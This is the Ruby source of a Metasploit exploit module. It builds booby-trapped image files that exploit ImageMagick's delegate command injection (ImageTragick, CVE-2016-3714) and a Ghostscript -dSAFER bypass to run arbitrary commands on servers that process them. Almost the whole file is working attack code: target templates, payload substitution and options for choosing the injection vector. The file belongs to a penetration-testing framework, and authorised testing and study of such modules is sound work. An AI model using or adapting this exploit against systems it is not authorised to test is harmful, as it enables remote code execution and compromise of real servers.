rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/fileformat/imagemagick_delegate.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  # Module metadata: the ImageMagick delegate command injection
  # (ImageTragick, CVE-2016-3714) plus the Ghostscript -dSAFER bypass
  # (CVE-2016-7976) used by the PS target, and the two options that pick
  # the output filename and the injection vector (popen vs. delegate).
  #
  # @param info [Hash] metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ImageMagick Delegate Arbitrary Command Execution',
        'Description' => %q{
          This module exploits a shell command injection in the way "delegates"
          (commands for converting files) are processed in ImageMagick versions
          <= 7.0.1-0 and <= 6.9.3-9 (legacy).

          Since ImageMagick uses file magic to detect file format, you can create
          a .png (for example) which is actually a crafted SVG (for example) that
          triggers the command injection.

          The PostScript (PS) target leverages a Ghostscript -dSAFER bypass
          (discovered by taviso) to achieve RCE in the Ghostscript delegate.
          Ghostscript versions 9.18 and later are affected. This target is
          provided as is and will not be updated to track additional vulns.

          If USE_POPEN is set to true, a |-prefixed command will be used for the
          exploit. No delegates are involved in this exploitation.
        },
        'Author' => [
          'stewie', # Vulnerability discovery
          'Nikolay Ermishkin', # Vulnerability discovery
          'Tavis Ormandy', # Vulnerability discovery
          'wvu', # Metasploit module
          'hdm' # Metasploit module
        ],
        'References' => [
          ['CVE', '2016-3714'],
          ['CVE', '2016-7976'],
          ['URL', 'https://imagetragick.com/'],
          ['URL', 'https://seclists.org/oss-sec/2016/q2/205'],
          ['URL', 'https://seclists.org/oss-sec/2016/q3/682'],
          ['URL', 'https://github.com/ImageMagick/ImageMagick/commit/06c41ab'],
          ['URL', 'https://github.com/ImageMagick/ImageMagick/commit/a347456'],
          ['URL', 'http://permalink.gmane.org/gmane.comp.security.oss.general/19669']
        ],
        'DisclosureDate' => '2016-05-03',
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'BadChars' => "\x22\x27\x5c" # ", ', and \
        },
        'Targets' => [
          ['SVG file', { template: 'msf.svg' }], # convert msf.png msf.svg
          ['MVG file', { template: 'msf.mvg' }], # convert msf.svg msf.mvg
          ['PS file', { template: 'msf.ps' }] # PoC from taviso
        ],
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => [],
          'AKA' => ['ImageTragick'],
          'RelatedModules' => [
            'exploit/unix/fileformat/ghostscript_type_confusion',
            'exploit/multi/fileformat/ghostscript_failed_restore'
          ]
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [true, 'Output file', 'msf.png']),
        OptBool.new('USE_POPEN', [false, 'Use popen() vector', true])
      ]
    )
  end

  # Writes the output file (FILENAME) by substituting the placeholder command
  # in the selected template with the encoded payload. The SVG target
  # HTML-encodes the payload first, since it is embedded in an XML document.
  def exploit
    command = payload.encoded
    command = Rex::Text.html_encode(command) if target.name == 'SVG file'

    file_create(template.sub('echo vulnerable > /dev/tty', command))
  end

  # Reads the template for the current target from the framework data
  # directory, using the popen or delegate variant according to USE_POPEN.
  #
  # @return [String] the template contents
  # @raise fails the module (Failure::NoTarget) when no template file exists
  #   for this target/vector combination
  def template
    vector = datastore['USE_POPEN'] ? 'popen' : 'delegate'
    path = File.join(
      Msf::Config.data_directory, 'exploits', 'imagemagick', vector,
      target[:template]
    )

    File.read(path)
  rescue Errno::ENOENT
    fail_with(Failure::NoTarget, "Target has no #{vector} support")
  end
end